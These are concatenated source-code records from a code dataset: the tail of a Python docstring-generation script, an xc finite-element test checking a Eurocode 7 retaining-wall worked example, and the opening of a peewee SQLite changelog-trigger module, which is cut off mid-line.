type_spec_d, current_num_layer + 1))\n elif \"unknown\" in crt_spec_d:\n layer_2.append(f\"Unknown keys (variable input).\")\n else:\n raise Exception(\"No recognized keys in dict spec_d. 
\" + \\\n \"Must be one of 'dict_keys', 'dict_spec', 'unknown'.\" + \\\n \" Existing keys \" + ', '.join(crt_spec_d.keys()))\n crt_var_list.append(layer_2)\n elif \"list\" in st:\n layer_2 = []\n list_subtype = (st.split(\"<\")[1]).split(\">\")[0]\n if not check_var_against_type_spec_d(list_subtype, type_spec_d):\n raise Exception(f\"List subtype {list_subtype} not in type_spec_d.\")\n layer_2.append(prepare_docstrs_l(list_subtype, type_spec_d, current_num_layer + 1))\n crt_var_list.append(layer_2)\n\n logging.debug(\"For variable {var}, docstrings list is: \")\n logging.debug(crt_var_list)\n return crt_var_list\n\n\ndef check_var_against_type_spec_d(var, type_spec_d):\n # Returns True if good, False if bad\n if \"list\" not in var:\n if var not in type_spec_d:\n return False \n else:\n return True\n else:\n var = (var.split(\"<\")[1]).split(\">\")[0]\n if var not in type_spec_d:\n return False \n else:\n return True\n\n\n\n\n# rets funcN2vars \ndef get_func_name_to_variables(func_name_to_locs, python_file_fp):\n \"\"\"\n Description:\n \n \"\"\"\n \n file_lines = open(python_file_fp).read().split(\"\\n\")\n funcN2vars = {}\n for func_name in func_name_to_locs.keys():\n f_strt = func_name_to_locs[func_name][\"func_start\"]\n f_end = func_name_to_locs[func_name][\"func_end\"]\n func_ret_str = file_lines[f_strt - 1]\n func_def_str = \" \".join(file_lines[f_strt:f_end + 1])\n # Removing multiple spaces\n func_def_str = \" \".join(func_def_str.split())\n # func_vars is a list of strings, each a variable\n func_vars = get_function_variables_from_func_string(func_def_str)\n argsNret_d = {}\n if '' in func_vars:\n func_vars.remove('')\n if len(func_vars) > 0:\n argsNret_d[\"Args\"] = func_vars\n funcN2vars[func_name] = argsNret_d \n\n ret_vars = get_function_return_variables(func_ret_str)\n if '' in ret_vars:\n ret_vars.remove('')\n if len(func_vars) > 0:\n argsNret_d[\"Returns\"] = ret_vars \n funcN2vars[func_name] = argsNret_d \n\n return funcN2vars\n\n# rets variables_list\ndef get_function_return_variables(func_ret_str):\n \"\"\"\n Desc:\n func_ret_str has to have a specific format:\n must look like '# rets {X}'.\n \"\"\"\n #HERE\n if not func_ret_str[:7] == \"# rets \":\n return []\n else:\n real_rets_str = func_ret_str[7:]\n print(real_rets_str)\n split_rets_str = real_rets_str.split(\" \")\n return split_rets_str\n\n\n# rets variables_list \ndef get_function_variables_from_func_string(func_string):\n variables_list = []\n variables_str = \"\".join(func_string.split(\"(\")[1:])\n variables_str = \"\".join(variables_str.split(\")\")[:-1])\n init_variables_list = variables_str.split(\", \")\n for v in init_variables_list:\n if '=' in v:\n variables_list.append(v.split(\"=\")[0])\n else:\n variables_list.append(v.strip())\n\n return variables_list\n\n\n# rets func_name_to_locs\ndef get_function_names_starts_and_ends(python_file_fp):\n\n file_lines = open(python_file_fp).read().split(\"\\n\")\n file_len = len(file_lines)\n func_name_to_locs = {}\n\n for i in range(file_len):\n c_line = file_lines[i]\n if c_line[0:4] == \"def \":\n function_name = re.findall(r\"^\\w+\", c_line[4:])[0]\n logging.debug(f\"found func; name: {function_name} start at row {i}.\")\n func_start = i\n j = 0\n while i + j < file_len:\n next_line = file_lines[i + j]\n # Two seperate regex searches, which one works?\n m = re.search(r'\\):[\\s]*$', next_line)\n if not m:\n j += 1\n else:\n if m:\n logging.debug(\"m found match at line \" + str(i+j))\n func_end = i + j\n if function_name in func_name_to_locs:\n raise 
Exception(\"Duplicate function name: \" + function_name)\n func_name_to_locs[function_name] = {'func_start': func_start,\n 'func_end': func_end}\n break\n if i + j == file_len:\n print(func_name_to_locs)\n raise Exception(\"File parsing error, reached EOF\")\n\n return func_name_to_locs\n\n\n# rets None \ndef add_docstrings_to_file(python_file_fp, funcN2vars2docstr): \n \"\"\"\n Desc:\n We break out of adding documentation if the flag\n '*DOCDONE' is the first line after the start of\n the function's documentation comment. This way,\n you can update the documentation if the flag\n isn't there.\n \"\"\"\n #HERE\n \n op_fp = os.path.join(os.getcwd(), \"doct_\" + os.path.basename(python_file_fp))\n if os.path.isfile(op_fp):\n raise Exception(\"Output file exists at \" + op_fp)\n\n func_name_to_locs = get_function_names_starts_and_ends(python_file_fp)\n\n end_to_func_name = {func_name_to_locs[x][\"func_end\"]:x for x in func_name_to_locs.keys()}\n\n file_lines = open(python_file_fp).read().split(\"\\n\")\n\n op_file_str_lines = []\n spacer = \" \"*4\n for i in range(len(file_lines)):\n op_file_str_lines.append(file_lines[i])\n if i in end_to_func_name:\n # Checking if documentation is needed\n next_line = file_lines[i+1]\n if '\"\"\"' in next_line:\n if '*DOCDONE' in file_lines[i+2]:\n continue\n func_name = end_to_func_name[i]\n if func_name not in funcN2vars2docstr:\n continue \n vars_d = funcN2vars2docstr[func_name]\n op_file_str_lines.append(spacer + '\"\"\"')\n op_file_str_lines.append(spacer + '*DOCDONE')\n op_file_str_lines.append(spacer + \"Args:\")\n args_d = vars_d[\"Args\"]\n for var, var_docstrs_l in args_d.items():\n logging.debug(f\"Working on var {var}.\")\n generate_docstr_from_docstr_l(var_docstrs_l, spacer,\n 2, op_file_str_lines)\n op_file_str_lines.append(spacer + \"Returns:\")\n rets_d = vars_d[\"Returns\"]\n for var, var_docstrs_l in rets_d.items():\n logging.debug(f\"Working on var {var}.\")\n generate_docstr_from_docstr_l(var_docstrs_l, spacer,\n 2, op_file_str_lines)\n\n op_file_str_lines.append(spacer + '\"\"\"')\n #logging.info(f\"Function {func_name} found at line {i}.\")\n\n with open(op_fp, \"w\") as g:\n g.write(\"\\n\".join(op_file_str_lines))\n\n logging.info(f\"Wrote output file to {op_fp}\")\n\n return None\n\n\ndef generate_docstr_from_docstr_l(docstr_l, spacer, num_depth, op_file_str_lines):\n # docstr_l is a list in which each item is either a string or a docstring list\n # Every time this runs, it adds a line to the op_file_str_lines list.\n if num_depth >= 10:\n print(docstr_l)\n with open(\"ErrorFile.txt\", \"w\") as g:\n g.write('\\n'.join(op_file_str_lines))\n raise Exception(\"Docstring depth exceeds 10 - possible loop issue.\")\n \n for x in docstr_l:\n if isinstance(x, str):\n if x != \"\":\n op_file_str_lines.append(spacer*num_depth + x)\n elif isinstance(x, list):\n generate_docstr_from_docstr_l(x, spacer, num_depth + 1, op_file_str_lines)\n\n\n\n\n \ndef test_1(types_cfg_json_fp, python_file_fp):\n\n type_spec_d = import_all_types(types_cfg_json_fp)\n\n\n\ndef test_3(types_cfg_json_fp, python_file_fp):\n type_spec_d = import_all_types(types_cfg_json_fp)\n funcN2vars = get_func_name_to_vars_from_file(python_file_fp)\n funcN2vars2docstr = create_documentation_args_returns_str(funcN2vars,\n type_spec_d,\n types_cfg_json_fp)\n\n add_docstrings_to_file(python_file_fp, funcN2vars2docstr)\n #print(func_names_to_doc_strings)\n\n\n\n\ndef test_2(python_file_fp):\n get_functions_info_from_file(python_file_fp)\n \n\n\ndef main():\n args = sys.argv\n 
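# Example invocation (see help_str below): python3 document_with_types.py <types_cfg_json_fp> <python_file_fp> 3\n    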
logging.basicConfig(level=logging.DEBUG)\n help_str = \"python3 document_with_types.py types_cfg_json_fp python_file_fp 1\"\n help_str += \"\\nOR\\n\" \n help_str += \"python3 document_with_types.py python_file_fp 2\"\n help_str += \"\\nOR\\n\" \n help_str += \"python3 document_with_types.py types_cfg_json_fp python_file_fp 3\"\n\n if args[-1] not in [\"1\", \"2\", \"3\"]:\n print(\"Not running.\")\n print(help_str)\n sys.exit(1)\n elif args[-1] == \"1\":\n types_cfg_json_fp = args[1]\n python_file_fp = args[2]\n test_1(types_cfg_json_fp, python_file_fp)\n sys.exit(0)\n elif args[-1] == \"2\":\n python_file_fp = args[1]\n test_2(python_file_fp)\n sys.exit(0)\n elif args[-1] == \"3\":\n types_cfg_json_fp = args[1]\n python_file_fp = args[2]\n test_3(types_cfg_json_fp, python_file_fp)\n sys.exit(0)\n else:\n print(help_str)\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OGalOz/auto_docval","sub_path":"samples/clear_doc_w_types.py","file_name":"clear_doc_w_types.py","file_ext":"py","file_size_in_byte":15147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25825046995","text":"# -*- coding: utf-8 -*-\n''' Retaining wall calculation verification test. Inspired on the \"A.4 worked example to accompany Chapter 4\" of the publication: Eurocode 7: Geotechnical Design Worked examples. Worked examples presented at the Workshop “Eurocode 7: Geotechnical Design” Dublin, 13-14 June, 2013.\n\nhttps://publications.jrc.ec.europa.eu/repository/handle/JRC85029\n'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2023, LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport os\nimport math\nimport geom\nimport xc\nfrom scipy.constants import g\nfrom materials.ec2 import EC2_materials\nfrom rough_calculations import ng_retaining_wall\nfrom actions import load_cases\nfrom actions import combinations\nfrom geotechnics import earth_pressure as ep\nfrom geotechnics import frictional_cohesive_soil as fcs\nfrom actions.earth_pressure import earth_pressure\n\n\n\n# __ __ _ _ _ \n# \\ \\ / /_ _| | | __ _ ___ ___ _ __ ___| |_ _ _ _ _ \n# \\ \\/\\/ / _` | | | / _` / -_) _ \\ ' \\/ -_) _| '_| || |\n# \\_/\\_/\\__,_|_|_| \\__, \\___\\___/_|_|_\\___|\\__|_| \\_, |\n# |___/ |__/ \n#\n# /+\n# / | V\n# / | i\n# Backfill slope -> / | r \n# / | t\n# zTopWall --- / | u\n# | | | a\n# | | | l\n# | | |\n# | | | b\n# | | | a\n# | | | c\n# | | | k\n# +---- ------------+ <- zTopFooting\n# |Toe Heel |\n# +-------------------+\n#\n\n# Wall geometry\nretainedHeight= 6.0\nzTopWall= retainedHeight\n\n## Stem\nstemTopWidth= 0.70 # width of the wall at its top.\nstemBottomWidth= stemTopWidth # width of the wall at its bottom.\n\n## Foundation.\nfootingWidth= 3.9 # overall breadth of the base.\nfootingThickness= 0.8 # thickness of the footing.\nbToe= 0.95 # width of the toe.\nbHeel= footingWidth-stemBottomWidth-bToe\n\n# __ __ _ _ _ \n# | \\/ |__ _| |_ ___ _ _(_)__ _| |___\n# | |\\/| / _` | _/ -_) '_| / _` | (_-<\n# |_| |_\\__,_|\\__\\___|_| |_\\__,_|_/__/\n\n# Partial factors (M1)\ngammaMPhiM1= 1.0\n\n# Granular fill.\nslopeOfBackfillSurface= math.radians(20)\n## Design approach 2 (A1+M1+R2).\ngranularFillM1= ep.RankineSoil(phi= math.radians(32.5), rho= 19e3/g, gammaMPhi= gammaMPhiM1, beta= slopeOfBackfillSurface) \n\n# Wall materials.\nconcrete= EC2_materials.C25\nsteel= EC2_materials.S500B\n\n# __ __ _ _ _ _ _ \n# 
\\ \\ / /_ _| | | ___| |__ (_)___ __| |_ \n# \\ \\/\\/ / _` | | | / _ \\ '_ \\| / -_) _| _|\n# \\_/\\_/\\__,_|_|_| \\___/_.__// \\___\\__|\\__|\n# |__/ \n\nwall= ng_retaining_wall.RetainingWall(name= 'A.4_worked_example', stemHeight= retainedHeight, stemBottomWidth= stemBottomWidth, stemTopWidth= stemTopWidth, stemBackSlope= 0.0, footingThickness= footingThickness, bToe= bToe, bHeel= bHeel, concrete= concrete, steel= steel)\n\n# Characteristic total self-weight of wall.\nwallWeight= concrete.density()*wall.getArea()*g\nrefWallWeight= 183e3/10*g\nratioWallWeight= abs(wallWeight-refWallWeight)/refWallWeight\n# Characteristic self-weight of the backfill above the heel.\nbackfillAboveHeelArea= wall.getBackfillAvobeHeelArea(beta= granularFillM1.beta)\nbackfillAboveHeelWeight= granularFillM1.rho*g*backfillAboveHeelArea\nrefBackfillAboveHeelWeight= 274e3\nratioBFWeight= abs(backfillAboveHeelWeight-refBackfillAboveHeelWeight)/refBackfillAboveHeelWeight\nwallWeightOK= (abs(ratioWallWeight)<1e-9 and abs(ratioBFWeight)<1e-4)\n\n# Create wall FE model.\nwallFEModel= wall.createLinearElasticFEModel(prbName= 'Retaining wall '+wall.name, kS= 15e6) # assumed value for subgrade reaction modulus.\npreprocessor= wallFEModel.getPreprocessor\n\n# _ _ _ \n# /_\\ __| |_(_)___ _ _ ___\n# / _ \\/ _| _| / _ \\ ' \\(_-<\n# /_/ \\_\\__|\\__|_\\___/_||_/__/\n \n#Actions.\nloadCaseManager= load_cases.LoadCaseManager(preprocessor)\nloadCaseNames= ['selfWeight','earthPress','liveLoad']\nloadCaseManager.defineSimpleLoadCases(loadCaseNames)\n\n### Partial safety factors on actions (A).\ngammaGA1= 1.35 # Set A1.\ngammaQA1= 1.5 # Set A1.\n\n# _ _ _ ___ _ \n# /_\\ __| |_(_)___ _ _ ___ | _ \\___ _ _ _ __ __ _ _ _ ___ _ _| |_ \n# / _ \\/ _| _| / _ \\ ' \\(_-<_ | _/ -_) '_| ' \\/ _` | ' \\/ -_) ' \\ _|_ \n# /_/ \\_\\__|\\__|_\\___/_||_/__(_) |_| \\___|_| |_|_|_\\__,_|_||_\\___|_||_\\__(_)\n \n## Self weight of the wall.\nselfWeight= loadCaseManager.setCurrentLoadCase('selfWeight')\nWselfk= wall.createSelfWeightLoads(rho= concrete.density(),grav= g)\n### Check characteristic total self-weight of wall:\nratioWselfk= abs(Wselfk.getResultant().y+183e3)/183e3\n\n## Dead load on the heel.\nheelFillDepth= wall.getBackfillAvobeHeelAvgHeight(beta= granularFillM1.beta, zGround= 0.0)\nWfillk= wall.createDeadLoad(heelFillDepth= heelFillDepth, toeFillDepth= 0.0, rho= granularFillM1.rho, grav= g)\n### Check characteristic self weight of backfill\nratioWfillk= abs(Wfillk.getResultant().y+refBackfillAboveHeelWeight)/refBackfillAboveHeelWeight\nweightLoadsOK= (abs(ratioWselfk)<.05 and abs(ratioWfillk)<.01)\n\n## Earth pressure.\n### Backfill soil properties\nKaM1= granularFillM1.Ka()\nratioKa= abs(KaM1-0.365)/0.365\nearthPressureOK= (abs(ratioKa)<1e-2)\ngSoil= granularFillM1.rho*g\nzBottomSoils=[-1e3]\nKSoils= [KaM1]\ngammaSoils= [gSoil]\nzWater= -1e3\ngammaWater= 1000*g\n### Set current load case.\nearthPress= loadCaseManager.setCurrentLoadCase('earthPress')\n\n## Define virtual back.\nvirtualBack= wall.getVirtualBack(beta= granularFillM1.beta)\nratioVirtualBack= abs(virtualBack.getLength()-7.62)/virtualBack.getLength()\nvirtualBackOK= (abs(ratioVirtualBack)<1e-3)\n\n### Earth pressure on back of wall stem.\nbackfillPressureModel= earth_pressure.EarthPressureModel(zGround= virtualBack.getFromPoint().y, zBottomSoils= zBottomSoils, KSoils= KSoils, gammaSoils= gammaSoils, zWater= zWater, gammaWater= gammaWater,qUnif=0)\nEaGk= wall.createBackfillPressures(backfillPressureModel, Delta= granularFillM1.beta, beta= 
granularFillM1.beta)\nvirtualBackThirdPoint= virtualBack.getToPoint()+virtualBack.getLength()/3.0*geom.Vector2d(0,1)\nEaGkRef= geom.SlidingVectorsSystem2d(virtualBackThirdPoint,-KaM1*0.5*gSoil*virtualBack.getLength()**2*geom.Vector2d(math.cos(granularFillM1.beta), math.sin(granularFillM1.beta)),0.0)\nratioEaGk= (EaGk.getResultant()-EaGkRef.getResultant()).getModulus()/EaGkRef.getResultant().getModulus()\n#### Compare with the result in the book.\nEaGkBook= 201e3\nratioEaGkBook= abs(EaGk.getModulus()-EaGkBook)/EaGkBook \ntoeEndPos= wall.getToeEndNodePosition()\nMGk= EaGk.getMoment(toeEndPos)\nMGkRef= EaGkRef.getMoment(toeEndPos)\nratioMGk= abs(MGk-MGkRef)/MGkRef\nearthPressureGOK= (abs(ratioEaGk)<1e-3 and abs(ratioEaGkBook)<1e-3 and abs(ratioMGk)<.05)\n\n# _ _ _ __ __ _ _ _ \n# /_\\ __| |_(_)___ _ _ ___ \\ \\ / /_ _ _ _(_)__ _| |__| |___ \n# / _ \\/ _| _| / _ \\ ' \\(_-<_ \\ V / _` | '_| / _` | '_ \\ / -_)\n# /_/ \\_\\__|\\__|_\\___/_||_/__(_) \\_/\\__,_|_| |_\\__,_|_.__/_\\___|\n \n### Set current load case.\nliveLoad= loadCaseManager.setCurrentLoadCase('liveLoad')\n### Uniform load on the backfill surface.\nqUnif= 5e3\nunifLoadPressure= earth_pressure.UniformPressureOnBackfill(zGround= virtualBack.getFromPoint().y, zBottomSoils= zBottomSoils, KSoils= KSoils, qUnif= qUnif)\nEaQk= wall.createBackfillPressures(pressureModel= unifLoadPressure, Delta= granularFillM1.beta, beta= granularFillM1.beta)\nvirtualBackMidPoint= virtualBack.getMidPoint()\n\nEaQkRef= geom.SlidingVectorsSystem2d(virtualBackMidPoint, -KaM1*qUnif*virtualBack.getLength()*geom.Vector2d(math.cos(granularFillM1.beta), math.sin(granularFillM1.beta)),0.0)\nratioEaQk= (EaQk.getResultant()-EaQkRef.getResultant()).getModulus()/EaQkRef.getResultant().getModulus()\nEaQkBook= 13.9e3\nratioEaQkBook= abs(EaQk.getModulus()-EaQkBook)/EaQkBook \nMQk= EaQk.getMoment(toeEndPos)\nMQkRef= EaQkRef.getMoment(toeEndPos)\nratioMQk= abs(MQk-MQkRef)/MQkRef\nearthPressureQOK= (abs(ratioEaQk)<1e-3 and abs(ratioEaQkBook)<.005 and abs(ratioMQk)<1e-3)\n\n# ### Uniform load on the heel of the wall\n# VQk= wall.createVerticalLoadOnHeel(unifLoadPressure)\n# ratioVQk= abs(VQk.getResultant().y+11.3e3)/11.3e3\n# MVQk= VQk.getMoment(toeEndPos)\n# QQk= qUnif*wall.bHeel\n# MVQkRef= QQk*(wall.getFootingWidth()-wall.bHeel/2) # There is an error in the arm lever they use in the book. 
See page 123.\n# ratioMVQk= abs(MVQk+MVQkRef)/MVQkRef\n# uniformLoadOnHeelOK= (abs(ratioVQk)<.01 and abs(ratioMVQk)<.1)\nuniformLoadOnHeelOK= True # Not considered in the book for approach 2.\n\n# Compute design thrust.\nEak= EaGk+EaQk\nEakBook= 214.9e3 # There is an error in the subindices\nratioEakBook= abs(Eak.getResultant().getModulus()-EakBook)/EakBook\n\n# Vertical component of design weight\nNEk= Wselfk.getResultant().y+Wfillk.getResultant().y+Eak.getResultant().y\nNEkBook= 530.5e3\nratioNEk= abs(NEk+NEkBook)/NEkBook\n\n# Compute horizontal component of design thrust.\nHEk= Eak.getResultant().x\nHEkBook= 202e3\nratioHEk= abs(HEk+HEkBook)/HEkBook\n\nresultantOK= (ratioEakBook<1e-3) and abs(ratioHEk)<1e-3 and abs(ratioNEk)<.02\n\n# totalLoad= Eak+Wselfk+Wfillk\n# MtotalLoad= totalLoad.getMoment(toeEndPos)\n# MtotalLoadRef= 332.5e3-1068e3\n# print('total load (A1 set): ', totalLoad)\n# print('design moment about wall toe (A1 set): ', MtotalLoad/1e3, 'kN.m/m')\n# print('reference value of design moment about wall toe (A1 set): ', MtotalLoadRef/1e3, 'kN.m/m')\n\n# ___ _ _ _ _ \n# / __|___ _ __ | |__(_)_ _ __ _| |_(_)___ _ _ ___\n# | (__/ _ \\ ' \\| '_ \\ | ' \\/ _` | _| / _ \\ ' \\(_-<\n# \\___\\___/_|_|_|_.__/_|_||_\\__,_|\\__|_\\___/_||_/__/\n \ncombContainer= combinations.CombContainer()\n\ndef composeCombinationString(gammaG, gammaQ):\n ''' Compose the combination string corresponding to the arguments.\n\n :param gammaG: partial factor for permanent loads.\n :param gammaQ: partial factor for variable loads.\n '''\n #loadCaseNames= ['selfWeight','earthPress','liveLoad']\n gammaGStr= str(gammaG)\n gammaQStr= str(gammaQ)\n retval= gammaGStr+'*selfWeight+'+gammaGStr+'*earthPress'\n if(gammaQ!=0.0):\n retval+= '+'+gammaQStr+'*liveLoad'\n return retval\n\n## GEO ultimate states. (type 1)\ncombContainer.ULS.perm.add('ULS01', composeCombinationString(gammaG= gammaGA1, gammaQ= 0.0))\ncombContainer.ULS.perm.add('ULS02', composeCombinationString(gammaG= gammaGA1, gammaQ= gammaQA1))\ncombContainer.dumpCombinations(preprocessor)\n\n\n# ___ ___ ___ _ __ _ _ _ \n# / __| __/ _ \\ __ _____ _ _(_)/ _(_)__ __ _| |_(_)___ _ _ ___\n# | (_ | _| (_) | \\ V / -_) '_| | _| / _/ _` | _| / _ \\ ' \\(_-<\n# \\___|___\\___/ \\_/\\___|_| |_|_| |_\\__\\__,_|\\__|_\\___/_||_/__/\n# \ngeoULSCombinations= ['ULS01','ULS02']\n\n# GEO verifications\ngammaR2Sliding= 1.1\ngammaR2Bearing= 1.4\n\n## Critical state (constant volume) angle of shearing resistance of the soil.\n## See clause 6.5.3 (10) of Eurocode 7 part 1. \nphi_cv= math.radians(30)\nfoundationSoilModel= fcs.FrictionalCohesiveSoil(phi= granularFillM1.phi, c= 0.0, rho= granularFillM1.rho, phi_cv= phi_cv, gammaMPhi= gammaMPhiM1)\n## Perform GEO verifications.\nsr= wall.performGEOVerifications(geoULSCombinations, foundationSoilModel= foundationSoilModel, toeFillDepth= wall.footingThickness, gammaRSliding= gammaR2Sliding, gammaRBearing= gammaR2Bearing)\n\n\n## Verification of resistance to sliding\nslidingResistanceDegreeOfUtilization= sr.getDegreeOfUtilizationForSliding()\n### There is an error in the book. 
We repeat the operations here:\nHEdBook= 274.6e3\nNEdBook= 716.9e3\nHRdBook= NEdBook*math.tan(math.radians(30))/gammaR2Sliding\nslidingResistanceDegreeOfUtilizationBook= HEdBook/HRdBook\n### End of book correction.\nratioSDOfU= abs(slidingResistanceDegreeOfUtilization-slidingResistanceDegreeOfUtilizationBook)/slidingResistanceDegreeOfUtilizationBook\n\n## Verification of bearing resistance\nbearingResistanceDegreeOfUtilization= sr.getDegreeOfUtilizationForBearingResistance()\nbearingResistanceDegreeOfUtilizationRef= 0.8442207731905604\n# The value calculated in the book is 99% (and we obtain 84%); the difference\n# is mainly due to the fact that the annex D of the EC7 part 1 (informative)\n# does not consider the depth factors in the Brinch-Hansen formula.\n# bearingResistanceDegreeOfUtilizationBook= 0.99\nratioBRDOfU= abs(bearingResistanceDegreeOfUtilization-bearingResistanceDegreeOfUtilizationRef)/bearingResistanceDegreeOfUtilizationRef\n\n## Verification of resistance to toppling\ntopplingResistanceDegreeOfUtilization= sr.getDegreeOfUtilizationForOverturning()\ntopplingResistanceDegreeOfUtilizationBook= 0.32\nratioTDOfU= abs(topplingResistanceDegreeOfUtilization-topplingResistanceDegreeOfUtilizationBook)/topplingResistanceDegreeOfUtilizationBook\n\ngeoVerificationsOK= (abs(ratioSDOfU)<.05 and abs(ratioBRDOfU)<1e-3 and abs(ratioTDOfU)<.1)\n\n'''\nprint('\\nCheck computation of virtual back.')\nprint('virtual back: ', virtualBack)\nprint('virtual back height: ', virtualBack.getLength())\nprint('ratioVirtualBack= ', ratioVirtualBack)\nprint('virtual back OK: ', virtualBackOK)\n\nprint('\\nCheck computation of the weight of the backfill above the wall heel.')\nprint('bHeel= ',bHeel, 'm')\nprint('wall weight: ', wallWeight/1e3, 'kN/m')\nprint('reference wall weight: ', refWallWeight/1e3, 'kN/m')\nprint('ratioWallWeight= ',ratioWallWeight)\nprint('weight of the backfill above the wall heel: ', backfillAboveHeelWeight/1e3, 'kN/m')\nprint('ratioBFWeight= ',ratioBFWeight)\nprint('Wall weight OK: ', wallWeightOK)\n\nprint('\\nCheck earth pressure coefficients.')\nprint('gSoil= ', gSoil)\nprint('KaM1= ', KaM1)\nprint('ratioKa= ', ratioKa)\nprint('Earth pressure OK: ', earthPressureOK)\n\nprint('\\nCheck weight loads.')\nprint('Wselfk= ', Wselfk.getResultant()*1e-3, 'kN/m')\nprint('ratioWselfk= ', ratioWselfk)\nprint('Wselfd (A1 set)= ', Wselfk)\nprint('Wfilld (A1 set)= ', Wfillk)\nprint('ratioWfillk= ', ratioWfillk)\nprint('Weight loads OK: ', weightLoadsOK)\n\nprint('\\nCheck earth pressure due to backfill weight.')\nprint('EaGk= ', EaGk)\nprint('EaGkRef= ', EaGkRef)\nprint('ratioEaGk= ', ratioEaGk)\nprint('ratioEaGkBook= ', ratioEaGkBook)\nprint('MGk= ', MGk/1e3)\nprint('MGkRef= ', MGkRef/1e3)\nprint('ratioMGk= ', ratioMGk)\nprint('Earth pressure G OK: ', earthPressureGOK)\n\nprint('\\nCheck earth pressure due to surface load.')\nprint('EaQk= ', EaQk, 'modulus: ', EaQk.getModulus()/1e3, 'zero moment line: ', EaQk.zeroMomentLine())\nprint('EaQkRef= ', EaQkRef, 'modulus: ', EaQkRef.getModulus()/1e3, 'zero moment line: ', EaQkRef.zeroMomentLine())\nprint('ratioEaQk= ', ratioEaQk)\nprint('ratioEaQkBook= ', ratioEaQkBook)\nprint('MQk= ', MQk/1e3)\nprint('MQkRef= ', MQkRef/1e3)\nprint('ratioMQk= ', ratioMQk)\nprint('Earth pressure Q OK: ', earthPressureQOK)\n\n# print('\\nCheck uniform load on the heel of the wall.')\n# print('VQk= ', VQk)\n# print('ratioVQk= ', ratioVQk)\n# print('MVQk= ', MVQk/1e3, 'kN.m/m')\n# print('MVQkRef=', MVQkRef/1e3, 'kN.m/m')\n# print('ratioMVQk= ', ratioMVQk)\n# 
print('Uniform load on heel OK: ', uniformLoadOnHeelOK)\n\nprint('\\nCheck resultant (A1 set).')\nprint('Eak= ', Eak)\nprint('|Eak|= ', Eak.getResultant().getModulus()/1e3,'kN/m')\nprint('EakBook= ', EakBook)\nprint('ratioEakBook= ', ratioEakBook)\nprint('HEk= ', HEk/1e3, 'kN/m')\nprint('ratioHEk= ', ratioHEk)\nprint('NEk= ', NEk/1e3, 'kN/m')\nprint('ratioNEk= ', ratioNEk)\nprint('Resultant OK: ', resultantOK)\n\nprint('\\nCheck sliding degree of utilization.')\nprint('sliding degree of utilization: ', slidingResistanceDegreeOfUtilization)\nprint('sliding degree of utilization book: ', slidingResistanceDegreeOfUtilizationBook)\nprint('ratioSDOfU= ', ratioSDOfU)\nprint('\\nCheck bearing degree of utilization.')\nprint('bearing degree of utilization: ', bearingResistanceDegreeOfUtilization)\nprint('ratioBRDOfU= ', ratioBRDOfU)\nprint('\\nCheck toppling degree of utilization.')\nprint('toppling degree of utilization: ', topplingResistanceDegreeOfUtilization)\nprint('toppling degree of utilization book: ', topplingResistanceDegreeOfUtilizationBook)\nprint('ratioSDOfU= ', ratioTDOfU)\nprint('GEO verifications OK: ', geoVerificationsOK)\n'''\n\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif(wallWeightOK and weightLoadsOK and earthPressureOK and virtualBackOK and earthPressureQOK and uniformLoadOnHeelOK and earthPressureGOK and resultantOK and geoVerificationsOK):\n print('test '+fname+': ok.')\nelse:\n lmsg.error(fname+' ERROR.')\n \n# Graphic output.\n# wall.draw()\n\n'''\n#########################################################\n# Graphic stuff.\nfrom postprocess import output_handler\noh= output_handler.OutputHandler(wall.modelSpace)\n\n## Uncomment to display blocks\n#oh.displayBlocks()\n## Uncomment to display the mesh\n#oh.displayFEMesh()\n\n## Uncomment to display the loads\nwall.modelSpace.addLoadCaseToDomain('earthPress')\noh.displayLoads()\n\n## Uncomment to display the vertical displacement\n#oh.displayDispRot(itemToDisp='uX')\n#oh.displayNodeValueDiagram(itemToDisp='uX')\n\n## Uncomment to display the reactions\n#oh.displayReactions()\n\n## Uncomment to display the internal force\n#oh.displayIntForcDiag('Mz')\n'''\n","repo_name":"xcfem/xc","sub_path":"verif/tests/rough_calculations/earth_retaining/retaining_wall_test_03.py","file_name":"retaining_wall_test_03.py","file_ext":"py","file_size_in_byte":17704,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"23294077110","text":"from peewee import *\nfrom playhouse.sqlite_ext import JSONField\n\n\nclass BaseChangeLog(Model):\n timestamp = DateTimeField(constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')])\n action = TextField()\n table = TextField()\n primary_key = IntegerField()\n changes = JSONField()\n\n\nclass ChangeLog(object):\n # Model class that will serve as the base for the changelog. 
This model\n # will be subclassed and mapped to your application database.\n base_model = BaseChangeLog\n\n # Template for the triggers that handle updating the changelog table.\n # table: table name\n # action: insert / update / delete\n # new_old: NEW or OLD (OLD is for DELETE)\n # primary_key: table primary key column name\n # column_array: output of build_column_array()\n # change_table: changelog table name\n template = \"\"\"CREATE TRIGGER IF NOT EXISTS %(table)s_changes_%(action)s\n AFTER %(action)s ON %(table)s\n BEGIN\n INSERT INTO %(change_table)s\n (\"action\", \"table\", \"primary_key\", \"changes\")\n SELECT\n '%(action)s', '%(table)s', %(new_old)s.\"%(primary_key)s\", \"changes\"\n FROM (\n SELECT json_group_object(\n col,\n json_array(\n case when json_valid(\"oldval\") then json(\"oldval\")\n else \"oldval\" end,\n case when json_valid(\"newval\") then json(\"newval\")\n else \"newval\" end)\n ) AS \"changes\"\n FROM (\n SELECT json_extract(value, '$[0]') as \"col\",\n json_extract(value, '$[1]') as \"oldval\",\n json_extract(value, '$[2]') as \"newval\"\n FROM json_each(json_array(%(column_array)s))\n WHERE \"oldval\" IS NOT \"newval\"\n )\n );\n END;\"\"\"\n\n drop_template = 'DROP TRIGGER IF EXISTS %(table)s_changes_%(action)s'\n\n _actions = ('INSERT', 'UPDATE', 'DELETE')\n\n def __init__(self, db, table_name='changelog'):\n self.db = db\n self.table_name = table_name\n\n def _build_column_array(self, model, use_old, use_new, skip_fields=None):\n # Builds a list of SQL expressions for each field we are tracking. This\n # is used as the data source for change tracking in our trigger.\n col_array = []\n for field in model._meta.sorted_fields:\n if field.primary_key:\n continue\n\n if skip_fields is not None and field.name in skip_fields:\n continue\n\n column = 